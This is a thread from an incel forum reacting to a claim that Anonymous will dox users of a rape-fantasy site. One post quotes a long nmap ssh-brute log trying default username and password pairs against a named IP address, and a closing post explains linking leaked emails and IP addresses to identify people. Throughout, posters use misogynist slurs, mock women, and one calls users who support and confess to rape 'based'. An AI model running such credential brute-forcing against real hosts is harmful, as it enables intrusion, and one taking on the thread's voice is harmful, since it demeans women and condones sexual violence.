Welcome to Incels.is - Involuntary Celibate Forum

Welcome! This is a forum for involuntary celibates: people who lack a significant other. Are you lonely and wish you had someone in your life? You're not alone! Join our forum and talk to people just like you.

JFL IT claims Anonymous is gonna doxx rapey users

So they are happy to be doxxed themselves? Smart move
 
Last edited:
Vj

Hand rubbing intensifies
 
Thank god I never made an account on there. I was really considering it at some point. I doubt there is much they can do other than get there IP address. It’s illegal to do anything else anyways. Plus they aren’t any better if they have to resort to doxxing
IT wants incels dead or locked up so they would probably send the fbi after you(if you registered on there).
 
Some few girls have posted pics there with the name of the site written on their bodies with lipstick. If they're fake, it's a very high effort fake tbh.
 
Some few girls have posted pics there with the name of the site written on their bodies with lipstick. If they're fake, it's a very high effort fake tbh.
lol why would they post there? btw what is actually the point of that site
 
IT wants incels dead or locked up so they would probably send the fbi after you(if you registered on there).
IT isn’t the group that is doxxing our fellow brocels on rapey. It is some weird hacker group called anonymous. IT is just celebrating the fact that it could happen. They aren’t capable of doing anything as they are incels in denial or landwhales.
 
lol why would they post there?
Attwhorism/feeling sexually desired/getting off to the rape fantasies posted on that site.

btw what is actually the point of that site
Apparently, make women, JBs in particular, meet with the men of the site, Nathan in particular. I think he wants them to run a way from their homes to live as sex toys with the men of the site.
 
Attwhorism/feeling sexually desired/getting off to the rape fantasies posted on that site.


Apparently, make women, JBs in particular, meet with the men of the site, Nathan in particular. I think he wants them to run a way from their homes to live as sex toys with the men of the site.
the dark triad pill strikes again
 
the dark triad pill strikes again
Some people here think dark triad/thugmaxxing is 100% cope. I say, it obviously isn't a magic spell, but it does help a lot. Nathan for instance was a high tier normie in looks before balding. It can work for him. But sadly, I think he might be jailed this time around. He's going too far.
 
Some people here think dark triad/thugmaxxing is 100% cope. I say, it obviously isn't a magic spell, but it does help a lot. Nathan for instance was a high tier normie in looks before balding. It can work for him. But sadly, I think he might be jailed this time around. He's going too far.

View: https://youtu.be/jVVKYmUnLzA?t=575


@BummerDrummer @Diocel
 
According to this if this paste bin is legit they brute forced the SSH pass.


View: https://pastebin.com/CFBzY3NH


  1. NSE: Script scanning 88.80.20.45.
  2. Initiating NSE at 08:09
  3. NSE: [ssh-run 88.80.20.45:22] Failed to specify credentials and command to run.
  4. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:root
  5. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:admin
  6. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:administrator
  7. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:webadmin
  8. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:sysadmin
  9. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:netadmin
  10. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:guest
  11. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:user
  12. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:web
  13. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:test
  14. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:
  15. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:
  16. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:
  17. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:
  18. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:
  19. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:
  20. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:
  21. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:
  22. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:
  23. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:
  24. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:123456
  25. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:123456
  26. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:123456
  27. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:123456
  28. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:123456
  29. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:123456
  30. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:123456
  31. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:123456
  32. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:123456
  33. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:123456
  34. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:12345
  35. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:12345
  36. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:12345
  37. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:12345
  38. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:12345
  39. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:12345
  40. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:12345
  41. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:12345
  42. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:12345
  43. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:12345
  44. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:123456789
  45. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:123456789
  46. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:123456789
  47. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:123456789
  48. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:123456789
  49. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:123456789
  50. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:123456789
  51. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:123456789
  52. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:123456789
  53. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:123456789
  54. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:password
  55. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:password
  56. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:password
  57. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:password
  58. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:password
  59. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:password
  60. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:password
  61. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:password
  62. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:password
  63. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:password
  64. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:iloveyou
  65. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:iloveyou
  66. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:iloveyou
  67. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:iloveyou
  68. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:iloveyou
  69. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:iloveyou
  70. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:iloveyou
  71. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:iloveyou
  72. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:iloveyou
  73. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:iloveyou
  74. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:princess
  75. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:princess
  76. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:princess
  77. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:princess
  78. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:princess
  79. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:princess
  80. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:princess
  81. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:princess
  82. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:princess
  83. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:princess
  84. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:12345678
  85. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:12345678
  86. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:12345678
  87. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:12345678
  88. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:12345678
  89. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:12345678
  90. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:12345678
  91. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:12345678
  92. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:12345678
  93. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:12345678
  94. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:1234567
  95. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:1234567
  96. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:1234567
  97. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:1234567
  98. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:1234567
  99. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:1234567
  100. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:1234567
  101. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:1234567
  102. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:1234567
  103. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:1234567
  104. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:abc123
  105. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:abc123
  106. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:abc123
  107. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:abc123
  108. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:abc123
  109. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:abc123
  110. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:abc123
  111. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:abc123
  112. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:abc123
  113. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:abc123
  114. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:nicole
  115. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:nicole
  116. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:nicole
  117. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:nicole
  118. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:nicole
  119. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:nicole
  120. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:nicole
  121. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:nicole
  122. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:nicole
  123. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:nicole
  124. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:daniel
  125. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:daniel
  126. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:daniel
  127. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:daniel
  128. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:daniel
  129. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:daniel
  130. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:daniel
  131. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:daniel
  132. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:daniel
  133. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:daniel
  134. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:monkey
  135. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:monkey
  136. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:monkey
  137. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:monkey
  138. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:monkey
  139. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:monkey
  140. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:monkey
  141. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:monkey
  142. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:monkey
  143. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:monkey
  144. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:babygirl
  145. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:babygirl
  146. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:babygirl
  147. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:babygirl
  148. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:babygirl
  149. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:babygirl
  150. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:babygirl
  151. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:babygirl
  152. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:babygirl
  153. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:babygirl
  154. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:qwerty
  155. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:qwerty
  156. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:qwerty
  157. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:qwerty
  158. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:qwerty
  159. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:qwerty
  160. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:qwerty
  161. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:qwerty
  162. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:qwerty
  163. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:qwerty
  164. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:lovely
  165. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:lovely
  166. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:lovely
  167. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:lovely
  168. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:lovely
  169. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:lovely
  170. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:lovely
  171. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:lovely
  172. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:lovely
  173. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:lovely
  174. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:654321
  175. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:654321
  176. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:654321
  177. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:654321
  178. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:654321
  179. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:654321
  180. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:654321
  181. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:654321
  182. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:654321
  183. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:654321
  184. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:michael
  185. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:michael
  186. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:michael
  187. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:michael
  188. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:michael
  189. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:michael
  190. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:michael
  191. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:michael
  192. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:michael
  193. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:michael
  194. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:jessica
  195. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:jessica
  196. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: administrator:jessica
  197. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: webadmin:jessica
  198. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: sysadmin:jessica
  199. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: netadmin:jessica
  200. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: guest:jessica
  201. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: user:jessica
  202. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: web:jessica
  203. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: test:jessica
  204. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: root:111111
  205. NSE: [ssh-brute 88.80.20.45:22] Trying username/password pair: admin:111111
  206. Completed NSE at 08:11, 90.28s elapsed
  207. Initiating NSE at 08:11
  208. Completed NSE at 08:11, 0.05s elapsed

Also just lol if that last pair was actually his.... Jesus christ what a retard. I can't tell if it is or if for some reason the list was just cut off at that point, but it seems like it is.
 
According to this if this paste bin is legit they brute forced the SSH pass.


View: https://pastebin.com/CFBzY3NH




Also just lol if that last pair was actually his.... Jesus christ what a retard. I can't tell if it is or if for some reason the list was just cut off at that point, but it seems like it is.

Hopefully it was not that easy to guess. Over for @Diocel
 
Also just lol if that last pair was actually his.... Jesus christ what a retard. I can't tell if it is or if for some reason the list was just cut off at that point, but it seems like it is.

That is just an nmap scan. Anybody can do it, and yes the list is cut off, no password found.
Even anonymous would not be that of an amateur.
 
That is just an nmap scan. Anybody can do it, and yes the list is cut off, no password found.
Even anonymous would not be that of an amateur.
Oh I see I didn't look through the rest of the pastebin tbh.
 
That is just an nmap scan. Anybody can do it, and yes the list is cut off, no password found.
Even anonymous would not be that of an amateur.
Apparently they did brute force it though. At least the girl in the video claims that they dumps for everything and aren't posting it because the police are involved and don't want her to. She could just be LARPing I suppose though.


View: https://twitter.com/BelleDeMasi/status/1302287982028877824
 
They don't want her to post it because 90% of them are FBIcels :feelshaha:
They have names and linkedins listed in that pastebin no idea the relation or what for... Many are female names lol.
 
They have names and linkedins listed in that pastebin no idea the relation or what for... Many are female names lol.
Yeah at line 1500 they list out linkedins and shit

wtf are those

they dont look like they would be r @ p 3 y users, most are foreign

are they the domain servers employees?
 
Yeah at line 1500 they list out linkedins and shit

wtf are those

they dont look like they would be r @ p 3 y users, most are foreign

are they the domain servers employees?
Perhaps. Some also have the rapey in their name (lol wut? are they just pulling random shit?). I don't have a linkedin account right now so I can't look at any of them.
 
Perhaps. Some also have the rapey in their name (lol wut? are they just pulling random shit?). I don't have a linkedin account right now so I can't look at any of them.
im not <p><br></p> maxxed so its hard for me to decipher this stuff
 
Yeah. It would be pretty dumb to use an email and password on rapey that you use anywhere else.


How? Your IP address doesn't give your exact location.
It'd give your town/city at best.
 
Jfl most users of rape are CuckTears users
 
> doxx people using ip address
1559740701659
 
According to this if this paste bin is legit they brute forced the SSH pass.


View: https://pastebin.com/CFBzY3NH




Also just lol if that last pair was actually his.... Jesus christ what a retard. I can't tell if it is or if for some reason the list was just cut off at that point, but it seems like it is.

Did they bust in?
@Personalityinkwell
@Diocel
I need an answer
 
"Someone from Anonymous" as if anonymous is an actual organisation rather than a disorganised collection 11 year olds and manchildren wanting tl feel important online
 
such an empty threat.

how are they gonna get real names from usernames. Obviously no one is stupid enough to put their real name on that website except maybe the admins who probably dont even care if they get doxxed.
 
What the fuck is that site anyway?
 
Did they bust in?
@Personalityinkwell
@Diocel
I need an answer

from that pastebin no but with the amount of open ports listed in the port scan near the end, its a possibility.

looks like all thats in that pastebin is a vulnerability scan summary, there isnt much sensitive info in it really i would only panic about the open ports bc thats where most websites get fucked over from
 
the furute of .co tbh going to @TheSecondComing 's house when he gets doxxed
 
According to this if this paste bin is legit they brute forced the SSH pass.


View: https://pastebin.com/CFBzY3NH




Also just lol if that last pair was actually his.... Jesus christ what a retard. I can't tell if it is or if for some reason the list was just cut off at that point, but it seems like it is.


its not lol, looks like this is a custom tool they use to scan websites that runs various tests, odds are they ran through a common list and none of the results matched from the user-pass pairs in the text file they supplied the tool. if they actually brute forced the ssh there would be a lot more sensitive info in that paste. but nope its mostly just public info they scraped off the site. the only thing thats concerning is the amount of open insecure ports they could query
 
Last edited:
they'll prolly dox the few normies who were dumb enough to use email addresses or usernames connected to their real-life social media
maby if someone posted CP, they can inform ISPs about it but IP addresses aren't very reliable
 
its not lol, looks like this is a custom tool they use to scan websites that runs various tests, odds are they ran through a common list and none of the results matched from the user-pass pairs in the text file they supplied the tool. if they actually brute forced the ssh there would be a lot more sensitive info in that paste. but nope its mostly just public info they scraped off the site. the only thing thats concerning is the amount of open insecure ports they could query
Yeah I didn't read the rest of the paste bin. This is a bit old though and they claimed to.

It seems like it would be vulnerable to an attack though. It doesn't seem like he has any sort of brute force protection.
 
According to this if this paste bin is legit they brute forced the SSH pass.


View: https://pastebin.com/CFBzY3NH




Also just lol if that last pair was actually his.... Jesus christ what a retard. I can't tell if it is or if for some reason the list was just cut off at that point, but it seems like it is.

>12345
SHIT, they're onto me! My password!! :giga:
 
this is bullshit, I made an account when it was nearcels and made 0 posts there.
Even if you're doxxed they can't do anything to you if you haven't posted cp or "groomed" any jb's.
Targeting the users that made posts actively supporting and confessing to rape would be a better idea tbh.
Nothing should happen to those guys, they're based and use their freedom of speech to support whatever they want.
 
Last edited:
i have no idea how this works. can someone elab

@OverBeforeItBegan @Ping And Pong

It's to do with the links between your email address and IP address, for example:

John Smith is a user of gamewebsite.com, the website is hacked and his account details and IP are leaked e.g. [email protected] and an IP address of 123456

John Smith is also a user of dubiouswebsite.com, his account has a different email there but his IP of 123456 is the same

A group such as 'anonymous' can link this information together.
 

Users who are viewing this thread

shape1
shape2
shape3
shape4
shape5
shape6
Back
Top